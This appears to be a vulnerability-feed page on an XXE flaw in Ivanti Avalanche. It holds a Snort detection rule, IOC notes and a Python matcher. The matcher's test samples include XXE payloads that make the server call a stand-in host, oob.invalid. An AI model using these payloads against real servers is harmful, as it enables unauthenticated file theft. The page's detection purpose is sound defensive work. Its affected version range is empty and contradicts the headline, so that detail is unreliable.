CVE-2024-38653
published 2024-08-14

CVE-2024-38653: XXE in SmartDeviceServer in Ivanti Avalanche 6.3.1 allows a remote unauthenticated attacker to read arbitrary files on the server.

Priority: P1 · 87 · high
CVSS 3.1: 7.5
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 91.98% (99.8th percentile)

Affected

14 ranges

Vendor   Product    Version range      Fixed in
ivanti   avalanche  >= 6.4.4 < 6.4.4   6.4.4
(13 further ivanti / avalanche ranges are listed without version bounds)

Detection & IOCs (extracted from sources)

url:   /mdm/checkin
bytes: |3c 3f|xml
bytes: |3c 21|ENTITY|20 25|
snort: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti Avalanche SmartDeviceServer XML External Entity Injection (CVE-2024-38653)"; flow:established,to_server; http.method; content:"PUT"; http.uri; content:"/mdm/checkin"; fast_pattern; http.request_body; content:"|3c 3f|xml"; startswith; content:"|3c 21|ENTITY|20 25|"; distance:0; reference:url,github.com/pwnfuzz/POCs/tree/main/CVE%202024-38653; reference:cve,2024-38653; classtype:web-application-attack; sid:2059880; rev:1; metadata:affected_product Ivanti, attack_target Server, tls_state TLSDecrypt, created_at 2025_02_04, cve CVE_2024_38653, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Exploit, updated_at 2025_02_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit traffic is a PUT request to /mdm/checkin with Content-Type: application/xml, containing an XML body that starts with an XML declaration followed by a DOCTYPE with an ENTITY % declaration — characteristic of a blind/OOB XXE payload.
  • The exploit triggers an outbound HTTP callback from the server; detection via interactsh/OOB channel shows the callback User-Agent is 'Java', indicating the server-side XML parser is Java-based (e.g., Java's built-in SAX/DOM parser).
  • The Snort/ET rule keys on: HTTP PUT method + URI /mdm/checkin + request body starting with XML declaration bytes (3c 3f = '<?') followed by ENTITY % bytes (3c 21 = '<!', 20 25 = ' %') — all three conditions must match to fire.
  • The vulnerability is unauthenticated — no session cookie or Authorization header is required. Any PUT to /mdm/checkin with a malicious XML body should be treated as a potential exploit attempt.
  • The ET Snort rule (sid:2059880) requires TLS decryption to be effective against HTTPS traffic, as noted in the metadata.
  • The Nuclei template uses an interactsh OOB callback to confirm exploitation; the matcher checks for an inbound HTTP request with User-Agent containing 'Java'. Environments without OOB/interactsh infrastructure will not be able to confirm exploitation using this template as-is.
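The matching logic the bullets above describe, as an added example that is not code from the page's sources, from Emerging Threats or from Ivanti: a Python re-implementation of the three conditions sid:2059880 keys on (PUT, URI /mdm/checkin, body starting with `<?xml` and later containing `<!ENTITY %`), run over constructed sample requests. The `HttpRequest` class, the `has_dtd` helper and every sample body are assumptions of this example; `has_dtd` goes beyond the rule, on the reasoning that a device check-in should never carry a DOCTYPE at all, so it catches general-entity XXE bodies the parameter-entity rule ignores.

```python
# Added example (not from the page's sources, Emerging Threats or Ivanti):
# re-implementation of the three conditions of ET rule sid:2059880, plus a
# broader "any DTD in a check-in" check, evaluated over constructed requests.
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    """Minimal parsed HTTP request; only the fields the rule inspects."""
    method: str
    uri: str
    body: bytes
    headers: dict = field(default_factory=dict)


XML_DECL = b"<?xml"           # |3c 3f|xml in the rule
PARAM_ENTITY = b"<!ENTITY %"  # |3c 21|ENTITY|20 25| in the rule
DOCTYPE = b"<!DOCTYPE"        # used only by the broader check below


def matches_et_rule(req: HttpRequest) -> bool:
    """All three rule conditions must hold for the alert to fire."""
    if req.method.upper() != "PUT":
        return False
    # Snort's http.uri content match is a substring match; mirror that.
    if "/mdm/checkin" not in req.uri:
        return False
    # 'startswith' anchors the XML declaration at offset 0 of the body.
    if not req.body.startswith(XML_DECL):
        return False
    # 'distance:0' requires the parameter-entity marker after the previous match.
    return req.body.find(PARAM_ENTITY, len(XML_DECL)) != -1


def has_dtd(req: HttpRequest) -> bool:
    """Lower-confidence, broader check (assumption of this example, not part
    of the rule): a check-in never needs a DTD, so any DOCTYPE sent to
    /mdm/checkin deserves a look, parameter entity or not."""
    return "/mdm/checkin" in req.uri and DOCTYPE in req.body


# Constructed sample traffic; nothing here was captured from a real system.
SAMPLES = {
    "benign_checkin": HttpRequest(
        "PUT", "/mdm/checkin",
        b'<?xml version="1.0"?><checkin><id>dev-1</id></checkin>',
        {"Content-Type": "application/xml"}),
    "param_entity_put": HttpRequest(
        "PUT", "/mdm/checkin",
        b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY % e SYSTEM "http://oob.invalid/">%e;]><checkin/>',
        {"Content-Type": "application/xml"}),
    "get_same_body": HttpRequest(
        "GET", "/mdm/checkin",
        b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY % e SYSTEM "http://oob.invalid/">%e;]>'),
    "other_uri": HttpRequest(
        "PUT", "/api/status",
        b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY % e SYSTEM "http://oob.invalid/">%e;]>'),
    "doctype_no_param_entity": HttpRequest(
        "PUT", "/mdm/checkin",
        b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY e "x">]><checkin>&e;</checkin>'),
}


def classify(samples: dict) -> list:
    """Return (name, rule_fired, dtd_seen) for each sample request."""
    return [(name, matches_et_rule(r), has_dtd(r)) for name, r in samples.items()]


if __name__ == "__main__":
    for name, fired, dtd in classify(SAMPLES):
        print(f"{name:26s} rule={'ALERT' if fired else 'pass '}  dtd={'yes' if dtd else 'no'}")
```

Only `param_entity_put` fires the rule: the GET and the other-URI requests carry the same body but fail the method or URI condition, and `doctype_no_param_entity` declares a general entity rather than `<!ENTITY %`, which the rule does not cover but `has_dtd` does. Because the rule anchors `<?xml` with `startswith`, a body that does not begin with the declaration at byte 0 also passes the rule silently, which is one more reason to pair it with the broader DTD check in environments that decrypt TLS.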

CVSS provenance

nvd        v3.1  7.5  HIGH  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd        v3.0  8.2  HIGH  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
vulncheck        7.5  HIGH